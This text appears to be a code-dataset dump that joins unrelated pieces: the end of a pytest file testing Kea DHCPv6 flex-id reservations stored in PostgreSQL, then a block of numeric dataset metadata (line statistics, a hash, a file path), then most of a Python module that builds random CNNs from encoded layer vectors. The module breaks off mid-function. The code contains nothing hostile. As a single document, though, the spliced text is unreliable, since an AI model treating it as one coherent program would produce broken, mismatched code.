    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 13)
    srv_msg.response_check_suboption_content(13, 3, 'statuscode', 0)
@pytest.mark.v6
@pytest.mark.flexid
@pytest.mark.kea_only
def test_v6_hooks_flexid_replace_duid_release_pgsql():
    """Release with a different DUID, flex-id reservation stored in PostgreSQL.

    Same scenario as test_v6_hooks_flexid_replace_duid_release but the host
    reservation lives in the PostgreSQL backend: a client with a new DUID but
    the original flex-id (vendor sub-option 1026) must release the lease for
    3000::f with status code 0 (Success).
    """
    misc.test_setup()
    srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
    # NOTE(review): an in-config reservation is also defined here alongside the
    # PostgreSQL one below — presumably intentional duplication; confirm it is needed.
    srv_control.host_reservation_in_subnet('hostname',
                                           'reserved-hostname',
                                           0,
                                           'flex-id',
                                           '01:02:03:04:05:06')
    srv_control.host_reservation_in_subnet_add_value(0, 0, 'ip-address', '3000::f')
    srv_control.add_line({"host-reservation-identifiers": ["duid", "flex-id"]})
    srv_control.add_hooks('libdhcp_flex_id.so')
    srv_control.add_parameter_to_hook(1,
                                      'identifier-expression',
                                      'vendor[4491].option[1026].hex')
    srv_control.add_parameter_to_hook(1, 'replace-client-id', True)
    srv_control.enable_db_backend_reservation('PostgreSQL')
    srv_control.new_db_backend_reservation('PostgreSQL', 'flex-id', '01:02:03:04:05:06')
    srv_control.update_db_backend_reservation('hostname', 'reserved-hostname', 'PostgreSQL', 1)
    srv_control.update_db_backend_reservation('dhcp6_subnet_id', 1, 'PostgreSQL', 1)
    srv_control.ipv6_address_db_backend_reservation('3000::f', '$(EMPTY)', 'PostgreSQL', 1)
    srv_control.upload_db_reservation('PostgreSQL')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    # SOLICIT/ADVERTISE: reserved address offered for the matching flex-id.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_does_include('Client', 'IA-NA')
    srv_msg.client_send_msg('SOLICIT')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'ADVERTISE')
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # REQUEST/REPLY: lease assigned.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:f6:f5:f4:f3:f2:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('REQUEST')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 5)
    srv_msg.response_check_suboption_content(5, 3, 'addr', '3000::f')
    # Client with different DUID (same flex-id) tries to release -> Success (0).
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'DUID', '00:03:00:01:ff:ff:ff:ff:ff:01')
    srv_msg.client_copy_option('IA_NA')
    srv_msg.client_copy_option('server-id')
    srv_msg.client_does_include('Client', 'client-id')
    srv_msg.client_sets_value('Client', 'enterprisenum', '4491')
    srv_msg.client_does_include('Client', 'vendor-class')
    srv_msg.add_vendor_suboption('Client', 1026, '01:02:03:04:05:06')
    srv_msg.client_does_include('Client', 'vendor-specific-info')
    srv_msg.client_send_msg('RELEASE')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'REPLY')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(2)
    srv_msg.response_check_include_option(3)
    srv_msg.response_check_option_content(3, 'sub-option', 13)
    srv_msg.response_check_suboption_content(13, 3, 'statuscode', 0)
| 45.740036
| 108
| 0.68608
| 7,042
| 50,497
| 4.544022
| 0.027833
| 0.09244
| 0.087378
| 0.111628
| 0.988187
| 0.987093
| 0.987093
| 0.985281
| 0.985281
| 0.985281
| 0
| 0.052509
| 0.178209
| 50,497
| 1,103
| 109
| 45.781505
| 0.718589
| 0.02614
| 0
| 0.966916
| 0
| 0
| 0.2146
| 0.043945
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018143
| true
| 0.037353
| 0.004269
| 0
| 0.022412
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cce943a3c27ae0dfe1e2a98ae0d5e6c9504d27ac
| 162,877
|
py
|
Python
|
CNNGeneration/CustomCNNGeneration.py
|
NEUSoftGreenAI/NeurstrucEnergy
|
94c5c2f4796382f37e0f2f77a4f6484c0e5f2260
|
[
"MIT"
] | null | null | null |
CNNGeneration/CustomCNNGeneration.py
|
NEUSoftGreenAI/NeurstrucEnergy
|
94c5c2f4796382f37e0f2f77a4f6484c0e5f2260
|
[
"MIT"
] | null | null | null |
CNNGeneration/CustomCNNGeneration.py
|
NEUSoftGreenAI/NeurstrucEnergy
|
94c5c2f4796382f37e0f2f77a4f6484c0e5f2260
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
from threading import Thread
import time
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
import torch.utils.data as Data
import numpy as np
from multiprocessing import Process
from numpy import *
import torch.multiprocessing as mp
from torch.multiprocessing import Pool, Manager
from queue import Queue
import collections
import random
import requests
import csv
import string
import pandas as pd
import math
import traceback
np.set_printoptions(threshold=500)
class NNgenerator(nn.Module):
    def __init__(self, layer_parameters, layer_link, layer_id):
        """Build an nn.ModuleList of layers from flat encoding vectors.

        Args:
            layer_parameters: flat sequence of per-layer hyper-parameters;
                consecutive slices of it (length given by get_params_length)
                describe one layer each.
            layer_link: flat encoding of inter-layer connections; consumed in
                slices of get_link_length per layer.
            layer_id: sequence of integer layer-type codes, one per layer
                (dispatched by make_layer: 0 = Conv1d, 1 = Conv2d, ...).

        NOTE(review): link_vector_to_graph / get_in_degree / get_out_degree /
        get_params_length / get_link_length are defined outside this view;
        in_degree_list and out_degree_list are computed but unused here —
        presumably get_in_degree/get_out_degree have needed side effects, or
        this is leftover code; confirm before removing.
        """
        super(NNgenerator, self).__init__()
        self.layer_parameters = layer_parameters
        self.layer_link = layer_link
        self.layer_id = layer_id
        self.layer_list = []
        # Cursors into the flat parameter/link vectors, advanced per layer.
        self.parameters_flag = 0
        self.link_flag = 0
        self.link_graph = self.link_vector_to_graph(self.layer_link, len(self.layer_id))
        in_degree_list = self.get_in_degree()
        out_degree_list = self.get_out_degree()
        for i in range(0, len(self.layer_id)):
            # Each layer consumes its own slice of the parameter and link vectors.
            params_length = self.get_params_length(self.layer_id[i])
            link_length = self.get_link_length(i)
            self.layer_list.append(self.make_layer(self.layer_parameters[self.parameters_flag:self.parameters_flag + params_length], self.layer_link[self.link_flag:self.link_flag + link_length], self.layer_id[i]))
            self.parameters_flag += params_length
            self.link_flag += link_length
        # Register the layers as sub-modules so their parameters are tracked.
        self.layer_list = nn.ModuleList(self.layer_list)
def make_layer(self, parameters, link, id):
'''
生成一个层
'''
# print(parameters,id,len(parameters))
if(id == 0):
in_channels,out_channels,kernel_size,stride,padding,dilation,groups = parameters[-7:]
return nn.Conv1d(in_channels,out_channels,kernel_size,stride=stride,padding=padding,dilation=dilation,groups=groups)
elif(id == 1):
# print(parameters)
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups = parameters[-11:]
return nn.Conv2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),dilation=(dilation_height, dilation_width),groups=groups)
elif(id == 2):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,groups = parameters[-15:]
return nn.Conv3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),dilation=(dilation_depth, dilation_height, dilation_width),groups=groups)
elif(id == 3):
in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups = parameters[-8:]
return nn.ConvTranspose1d(in_channels,out_channels,kernel_size=kernel_size,stride=stride,padding=padding,output_padding=output_padding,dilation=dilation,groups=groups)
elif(id == 4):
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation,groups = parameters[-12:]
# print(in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation,groups)
return nn.ConvTranspose2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),output_padding=(output_padding_height,output_padding_width),dilation=dilation,groups=groups)
elif(id == 5):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,\
padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,dilation,groups = parameters[-16:]
return nn.ConvTranspose3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),output_padding=(output_padding_depth, output_padding_height, output_padding_width),dilation=dilation,groups=groups)
elif(id == 6):
#如果是max pooling则需要返回indices
kernel_size,stride,padding,dilation,pool_type = parameters[-5:]
if(pool_type == 0):
#为max pooling
return nn.MaxPool1d(kernel_size = kernel_size, stride=stride, padding=padding, dilation=dilation, return_indices=True)
else:
#为avg pooling
#不支持dilation,在生成时要默认成1
return nn.AvgPool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(id == 7):
#如果是max pooling则需要返回indices
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type = parameters[-9:]
if(pool_type == 0):
#为max pooling
return nn.MaxPool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width),dilation=(dilation_height, dilation_width), return_indices=True)
else:
#为avg pooling
#不支持dilation,在生成时要默认成1
return nn.AvgPool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
padding=(padding_height, padding_width))
elif(id == 8):
#如果是max pooling则需要返回indices
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type = parameters[-13:]
if(pool_type == 0):
#为max pooling
return nn.MaxPool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width),dilation=(dilation_depth, dilation_height, dilation_width), return_indices=True)
else:
#为avg pooling
#不支持dilation,在生成时要默认成1
return nn.AvgPool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
padding=(padding_depth, padding_height, padding_width))
elif(id == 9):
kernel_size,stride,padding = parameters[-3:]
return nn.MaxUnpool1d(kernel_size = kernel_size, stride=stride, padding=padding)
elif(id == 10):
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width = parameters[-6:]
return nn.MaxUnpool2d(kernel_size = (kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),padding=(padding_height, padding_width))
elif(id == 11):
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width = parameters[-9:]
return nn.MaxUnpool3d(kernel_size = (kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),padding=(padding_depth, padding_height, padding_width))
elif(id == 12):
output_size_L,pool_type = parameters[-2:]
if(pool_type == 0):
#为max pooling return_indices
return nn.AdaptiveMaxPool1d(output_size_L)
else:
#为avg pooling
return nn.AdaptiveAvgPool1d(output_size_L)
elif(id == 13):
output_size_H,output_size_W,pool_type = parameters[-3:]
if(pool_type == 0):
#为max pooling return_indices
return nn.AdaptiveMaxPool2d((output_size_H,output_size_W))
else:
#为avg pooling
return nn.AdaptiveAvgPool2d((output_size_H,output_size_W))
elif(id == 14):
output_size_D,output_size_H,output_size_W,pool_type = parameters[-4:]
if(pool_type == 0):
#为max pooling return_indices
return nn.AdaptiveMaxPool3d((output_size_D,output_size_H,output_size_W))
else:
#为avg pooling
return nn.AdaptiveAvgPool3d((output_size_D,output_size_H,output_size_W))
elif(id == 15):
num_features = parameters[-1:][0]
return nn.BatchNorm1d(num_features)
elif(id == 16):
num_features = parameters[-1:][0]
return nn.BatchNorm2d(num_features)
elif(id == 17):
num_features = parameters[-1:][0]
return nn.BatchNorm3d(num_features)
elif(id == 18):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 19):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 20):
probability = parameters[-1:][0]
return nn.Dropout(p=probability)
elif(id == 21):
input_length,output_length = parameters[1],parameters[3]
return nn.Linear(input_length,output_length)
elif(id == 22):
sigmoid,tanh,ReLU,leaky_ReLU = parameters[-4:]
if(sigmoid == 1):
return nn.Sigmoid()
elif(tanh == 1):
return nn.Tanh()
elif(ReLU == 1):
return nn.ReLU()
else:
return nn.LeakyReLU()
#由于add和concat不是实际的神经网络层,随便返回一个神经网络层
elif(id == 23):
return nn.ReLU()
elif(id == 24):
return nn.ReLU()
elif(id == 25):
probability = parameters[-1:][0]
return nn.Dropout2d(p=probability)
elif(id == 26):
probability = parameters[-1:][0]
return nn.Dropout3d(p=probability)
def forward(self,x):
    '''
    Run the generated layer graph on input ``x`` via breadth-first traversal.

    Node roles, derived from the adjacency matrix:
      * out-degree 0 -> the node's output is part of the returned list
      * in-degree 0  -> the node consumes the initial input ``x``
      * in-degree 1  -> ordinary node fed by its single parent
      * in-degree >1 -> concat (layer id 23) or add (layer id 24) node

    Strategy:
      1. enqueue every in-degree-0 node as a BFS seed
      2. BFS the adjacency matrix, caching each node's output in ``comp_context``
      3. return the outputs of all out-degree-0 nodes
    '''
    layer_length = len(self.layer_id)
    queue = Queue(layer_length)
    # per-node cached outputs; integer 0 marks "not computed yet"
    comp_context = [0 for index in range(layer_length)]
    # per-node pooling indices, saved by MaxPool layers for later MaxUnpool layers
    unpool_indices = [0 for index in range(layer_length)]
    in_degree_list = self.get_in_degree()
    out_degree_list = self.get_out_degree()
    BFS_flag = np.zeros(layer_length,dtype = int)  # 1 = node already enqueued once
    # seed the BFS with all nodes that take the initial input
    for i in range(0,layer_length):
        if(in_degree_list[i] == 0):
            queue.put(i)
            BFS_flag[i] = 1
    while not queue.empty():
        layer_index = queue.get()
        if(in_degree_list[layer_index] == 0):
            # source node: apply the layer directly to the network input
            comp_context[layer_index] = self.layer_list[layer_index](x)
            children_indices = self.get_children_indices(layer_index)  # enqueue children
            for i in range(0,len(children_indices)):
                if(BFS_flag[children_indices[i]] == 0):
                    queue.put(children_indices[i])
                    BFS_flag[children_indices[i]] = 1
        elif(in_degree_list[layer_index] > 0):
            # find all parents; one parent = ordinary node, several = concat/add
            parent_indices = self.get_parent_indices(layer_index)
            if(len(parent_indices) == 1):
                if(self.layer_id[layer_index] == 21):
                    # fully-connected layer: flatten the parent output unless it is already 2-D
                    dimension = len(comp_context[parent_indices[0]].size())
                    if(dimension == 2):
                        # already flat (a previous FC layer flattened it)
                        comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
                    else:
                        comp_context[layer_index] = comp_context[parent_indices[0]].view(comp_context[parent_indices[0]].size(0),-1)
                        comp_context[layer_index] = self.layer_list[layer_index](comp_context[layer_index])
                else:
                    if(self.layer_id[layer_index] == 6 or self.layer_id[layer_index] == 7 or self.layer_id[layer_index] == 8):
                        # pooling layer: MaxPool variants were built with return_indices=True
                        # and therefore also yield indices for later unpooling
                        if(hasattr(self.layer_list[layer_index], 'return_indices')):
                            comp_context[layer_index],unpool_indices[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
                        else:
                            comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
                    elif(self.layer_id[layer_index] == 9 or self.layer_id[layer_index] == 10 or self.layer_id[layer_index] == 11):
                        # unpooling layer: reuse the indices its parent MaxPool saved
                        comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]],unpool_indices[parent_indices[0]])
                    else:
                        comp_context[layer_index] = self.layer_list[layer_index](comp_context[parent_indices[0]])
                children_indices = self.get_children_indices(layer_index)  # enqueue children
                for i in range(0,len(children_indices)):
                    if(BFS_flag[children_indices[i]] == 0):
                        queue.put(children_indices[i])
                        BFS_flag[children_indices[i]] = 1
            elif(len(parent_indices) > 1):
                # Multi-parent node. With BFS a node can be dequeued before all of its
                # parents have produced output; in that case requeue it and retry later.
                for i in range(0,len(parent_indices)):
                    if(type(comp_context[parent_indices[i]]) != torch.Tensor):
                        queue.put(layer_index)
                        break
                else:
                    # all parents ready: gather their outputs into a tuple
                    converge_tuple = ()
                    for i in range(0,len(parent_indices)):
                        converge_tuple += (comp_context[parent_indices[i]],)
                    if(self.layer_id[layer_index] == 23):
                        # concat node: join along the channel dimension
                        comp_context[layer_index] = torch.cat(converge_tuple, 1)
                    elif(self.layer_id[layer_index] == 24):
                        # add node: element-wise sum of all parent outputs
                        comp_context[layer_index] = converge_tuple[0]
                        for i in range(1,len(parent_indices)):
                            comp_context[layer_index] = torch.add(comp_context[layer_index],converge_tuple[i])
                    children_indices = self.get_children_indices(layer_index)  # enqueue children
                    for i in range(0,len(children_indices)):
                        if(BFS_flag[children_indices[i]] == 0):
                            queue.put(children_indices[i])
                            BFS_flag[children_indices[i]] = 1
    # collect the outputs of all sink nodes (out-degree 0)
    return_list = []
    for i in range(0,layer_length):
        if(out_degree_list[i] == 0):
            return_list.append(comp_context[i])
    return return_list
def get_link_length(self,pos):
    """Return the length of the link vector for the node at position ``pos``.

    Row ``pos`` of the lower-triangular adjacency encoding holds ``pos + 1``
    entries (connections to every earlier node plus the diagonal).
    """
    return 1 + pos
def get_in_degree(self):
    """Return the in-degree of every node, computed from the adjacency matrix.

    The diagonal entry (which marks "receives the initial input") is excluded
    from the count.
    """
    degrees = []
    for idx in range(len(self.layer_id)):
        row = self.link_graph[idx]
        off_diagonal = [row[col] for col in range(len(row)) if col != idx]
        degrees.append(np.array(off_diagonal).sum())
    return degrees
def get_out_degree(self):
    """Return the out-degree of every node, computed from the adjacency matrix.

    Column sums are taken with the diagonal entry removed, since the diagonal
    encodes "receives the initial input" rather than a real edge.
    """
    degrees = []
    for idx in range(len(self.layer_id)):
        column = self.link_graph[:, idx]
        off_diagonal = [column[row] for row in range(len(column)) if row != idx]
        degrees.append(np.array(off_diagonal).sum())
    return degrees
def get_parent_indices(self,index):
    """Return the indices of the nodes whose output node ``index`` consumes.

    A parent is any off-diagonal 1 in row ``index`` of the adjacency matrix.
    """
    row = self.link_graph[index]
    return [col for col, value in enumerate(row) if value == 1 and col != index]
def get_children_indices(self,index):
    """Return the indices of the nodes that consume node ``index``'s output.

    A child is any off-diagonal 1 in column ``index`` of the adjacency matrix.
    """
    column = self.link_graph[:, index]
    return [row for row, value in enumerate(column) if value == 1 and row != index]
def link_vector_to_graph(self,link_list,length):
    """Convert a flat link vector into a ``length x length`` adjacency matrix.

    Diagonal entries mark whether a node receives the initial input. When the
    vector holds exactly ``length * length`` values it is read as a full
    row-major matrix; otherwise it is read as the lower triangle (diagonal
    included), row by row.
    """
    graph = np.zeros([length, length], dtype=float)
    values = iter(link_list)
    if len(link_list) == length * length:
        # full matrix encoding
        for row in range(length):
            for col in range(length):
                graph[row, col] = next(values)
    else:
        # lower-triangular encoding (including the diagonal)
        for row in range(length):
            for col in range(row + 1):
                graph[row, col] = next(values)
    return graph
def get_params_length(self,layer_id):
    """Return the length of the parameter vector used for the given layer id.

    Ids 0-26 cover the supported layer types (conv/deconv 1d-3d, pooling,
    unpooling, adaptive pooling, batch-norm, dropout, linear, activation,
    concat, add). Raises ``KeyError`` for an unknown id.
    """
    param_counts = dict(zip(range(27), (
        13, 19, 25,      # conv 1d/2d/3d
        14, 20, 26,      # transposed conv 1d/2d/3d
        11, 17, 23,      # pooling 1d/2d/3d
        9, 14, 19,       # unpooling 1d/2d/3d
        7, 9, 11,        # adaptive pooling 1d/2d/3d
        4, 5, 6,         # batch-norm 1d/2d/3d
        4, 5, 6,         # dropout 1d/2d/3d
        4,               # linear
        6,               # activation
        3, 3,            # concat, add
        5, 6,            # dropout2d, dropout3d
    )))
    return param_counts[layer_id]
def validate_NN(vg,dim):
    """Build and smoke-test the network described by ``vg``.

    Instantiates the generated network, runs a single forward pass on a random
    input of the rank implied by ``dim`` (1 -> 3-D, 2 -> 4-D, otherwise 5-D),
    then appends the network description and its parameter count to
    ``custom_data.txt``.

    Returns True when the forward pass succeeds; any inconsistency in the
    generated graph surfaces as an exception from ``NN(b_x)``.
    """
    NN = NNgenerator(vg.layer_parameters,vg.layer_link,vg.layer_id)
    total_params = sum(p.numel() for p in NN.parameters())
    # build a random input with the rank matching the data dimensionality
    if dim == 1:
        x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2])
    elif dim == 2:
        x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2],vg.net_input[3])
    else:
        x = torch.rand(vg.net_input[0],vg.net_input[1],vg.net_input[2],vg.net_input[3],vg.net_input[4])
    b_x = Variable(x)
    output = NN(b_x)  # forward pass validates the generated graph
    print(f'{total_params:,} total parameters.')
    # record: parameter vector, link vector, id vector, then scalar metadata
    fields = [
        ",".join('%s' % i for i in vg.layer_parameters),
        ",".join('%s' % i for i in vg.layer_link),
        ",".join('%s' % i for i in vg.layer_id),
        str(total_params),
        str(vg.dimension),
        str(vg.block_num),
        str(vg.stream_num),
    ]
    str1 = " ".join(fields) + " "
    # append mode so earlier records are preserved; the with-statement closes
    # the file (the old explicit file.close() inside the with was redundant)
    with open("custom_data.txt","a") as file:
        file.write(str1 + "\n")
    return True
class VectorGenerator():
def __init__(self,dimension,block_num,stream_num,batchNorm_prob=0.5,dropout_prob=0.2,more_fc_prob=0.15,max_fc_num=2,delete_fc_prob=0.1,no_dropout = 0.5,large=1):
    '''
    Configuration for randomly generating one CNN description.

    dimension: data dimensionality (1 -> 1d, 2 -> 2d, 3 -> 3d)
    block_num: number of CNN blocks
    stream_num: number of network streams (only 1 or 2)
    batchNorm_prob: probability of a BatchNorm after each conv layer
    dropout_prob: probability of dropout after conv/FC layers
    more_fc_prob: probability of stacking several FC layers
    max_fc_num: maximum number of fully-connected layers
    delete_fc_prob: probability of omitting the final FC layer
    no_dropout: probability of disabling dropout for the whole network
    large: size preset flag

    Flow: for every network stream, loop block_num times and emit one
    mainstream-CNN building block per iteration.
    '''
    super(VectorGenerator, self).__init__()
    self.dimension = dimension
    self.block_num = block_num
    self.stream_num = stream_num
    self.batchNorm_prob = batchNorm_prob
    self.dropout_prob = dropout_prob
    self.more_fc_prob = more_fc_prob
    self.max_fc_num = max_fc_num
    self.delete_fc_prob = delete_fc_prob
    self.large = large
    # resolve the no-dropout probability into a concrete boolean decision
    self.no_dropout = random.randint(1,100) <= no_dropout * 100
    # growing description of the generated network
    self.layer_num = 0          # number of nodes emitted so far
    self.layer_parameters = []  # flat parameter vectors of all layers
    self.layer_link = []        # flat link (adjacency) vectors
    self.layer_id = []          # layer-type ids
    self.net_input = self.get_net_input_size()
def get_outshape_recent_size(self,shape):
    """Snap ``shape`` to the nearest canonical feature-map size.

    Candidates are 112/56/28/14/7; ties go to the larger candidate. When no
    candidate is within the initial gap of 999 (i.e. ``shape`` is very large),
    the 224 fallback is returned unchanged from the original behavior.
    """
    best, best_gap = 224, 999
    for candidate in (112, 56, 28, 14, 7):
        distance = abs(shape - candidate)
        if distance < best_gap:
            best, best_gap = candidate, distance
    return best
def make_net(self):
    """
    Generate one CNN stream: ``self.block_num`` backbone blocks followed by an
    optional dropout layer and a head that is either
      (a) 1x1 conv to 1000 channels -> ReLU -> global average pool, or
      (b) optional average pool -> flatten -> fully-connected layer to 1000.
    All layers are appended to ``self.layer_parameters`` / ``self.layer_link``
    / ``self.layer_id`` and ``self.layer_num`` is advanced accordingly.
    """
    if True:
        # generate the CNN stream(s); currently a single stream
        for net_stream in range(0,1):
            last_block_input_size = self.net_input
            last_block_index = -1  # -1 means "block receives the initial network input"
            for block in range(0,self.block_num):
                # canonical spatial sizes walk 224 -> 112 -> 56 -> 28 -> 14 -> 7
                input_batch_size,input_channels,input_height,input_width = last_block_input_size
                out_channels = 1
                out_shape = 0
                if self.block_num <= 5:
                    # shallow nets: downsample aggressively
                    if input_height == 224:
                        out_shape = self.prob_random([56,112],[0.7,0.3])
                    else:
                        out_shape = self.prob_random([int(input_height*0.5),input_height],[0.9,0.1])
                    # when channels are already large for the chosen resolution,
                    # force another halving to cap the tensor size
                    recent_size = self.get_outshape_recent_size(out_shape)
                    if recent_size == 112 and input_channels > 100:
                        out_shape = int(input_height*0.5)
                    elif recent_size == 56 and input_channels > 200:
                        out_shape = int(input_height*0.5)
                    elif recent_size == 28 and input_channels > 500:
                        out_shape = int(input_height*0.5)
                    elif recent_size == 14 and input_channels > 1000:
                        out_shape = int(input_height*0.5)
                    if out_shape < 7:
                        # never shrink below the 7x7 floor
                        out_shape = input_height
                else:
                    if input_height == 224:
                        out_shape = self.prob_random([56,112],[0.1,0.9])
                    else:
                        remain_block = self.block_num - block - 1
                        if input_height > 7 * math.pow(2,remain_block):
                            # still plenty of room before the 7x7 floor: almost surely halve
                            out_shape = self.prob_random([int(input_height*0.5),input_height],[0.999,0.001])
                        else:
                            out_shape = self.prob_random([int(input_height*0.5),input_height],[0.7,0.3])
                        if out_shape < 7:
                            out_shape = input_height
                    # same channel-vs-resolution cap as the shallow branch
                    recent_size = self.get_outshape_recent_size(out_shape)
                    if recent_size == 112 and input_channels > 100:
                        out_shape = int(input_height*0.5)
                    elif recent_size == 56 and input_channels > 200:
                        out_shape = int(input_height*0.5)
                    elif recent_size == 28 and input_channels > 500:
                        out_shape = int(input_height*0.5)
                    elif recent_size == 14 and input_channels > 1000:
                        out_shape = int(input_height*0.5)
                output_size = [input_batch_size,out_channels,out_shape,out_shape]
                # block == 0 receives the initial input (last_block_index == -1)
                last_block_index,output_size = self.make_block(last_block_input_size,output_size,last_block_index,4)
                last_block_input_size = output_size
            fc_length = 0
            input_fc_size = last_block_input_size
            # optionally insert a dropout layer (id 19) before the head
            if random.randint(0,10) < 5:
                params = self.make_layer(19,last_block_input_size)
                self.layer_parameters += params
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [19]
                self.layer_num += 1
            # head: global-pool head or fully-connected head
            if random.randint(0,10) < 6:
                # global-pool head: 1x1 conv reshapes channels to 1000
                # 1) 1x1 convolution (id 1)
                in_channel = last_block_input_size[1]
                out_channel = 1000
                conv_params = [in_channel,out_channel, 1,1, 1,1, 0,0, 1,1, 1]
                params = last_block_input_size + [0,0,0,0] + conv_params
                output_size = self.get_output_size(params,1,last_block_input_size)
                params = last_block_input_size + output_size + conv_params
                self.layer_parameters += params
                link_list=[last_block_index]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [1]
                self.layer_num += 1
                last_layer_input_size = output_size
                # 2) ReLU (id 22); its parameter vector stores the flattened length
                length = last_layer_input_size[1]
                for i in range(2,len(last_layer_input_size)):
                    length *= last_layer_input_size[i]
                params = [1,length] + [0,0,1,0]
                self.layer_parameters += params
                link_list=[self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [22]
                self.layer_num += 1
                # 3) global average pool (id 7): kernel spans the whole feature map
                pooling_params = [last_layer_input_size[2],last_layer_input_size[2], 1,1, 0,0, 1,1, 1]
                params = last_layer_input_size + [0,0,0,0] + pooling_params
                output_size = self.get_output_size(params,7,last_layer_input_size)
                # NOTE(review): this record is built from last_block_input_size while the
                # conv step above used last_layer_input_size -- confirm this is intended
                params = last_block_input_size + output_size + pooling_params
                self.layer_parameters += params
                link_list = [self.layer_num-1]
                self.layer_link += self.get_link_vector(link_list,self.layer_num)
                self.layer_id += [7]
                self.layer_num += 1
                last_layer_input_size = output_size
            else:
                # fully-connected head; with some probability average-pool to
                # [1, channel, 1, 1] first
                if random.randint(0,10)<3:
                    pooling_params = [last_block_input_size[2],last_block_input_size[2], 1,1, 0,0, 1,1, 1]
                    params = last_block_input_size + [0,0,0,0] + pooling_params
                    output_size = self.get_output_size(params,7,last_block_input_size)
                    params = last_block_input_size + output_size + pooling_params
                    self.layer_parameters += params
                    link_list = [self.layer_num-1]
                    self.layer_link += self.get_link_vector(link_list,self.layer_num)
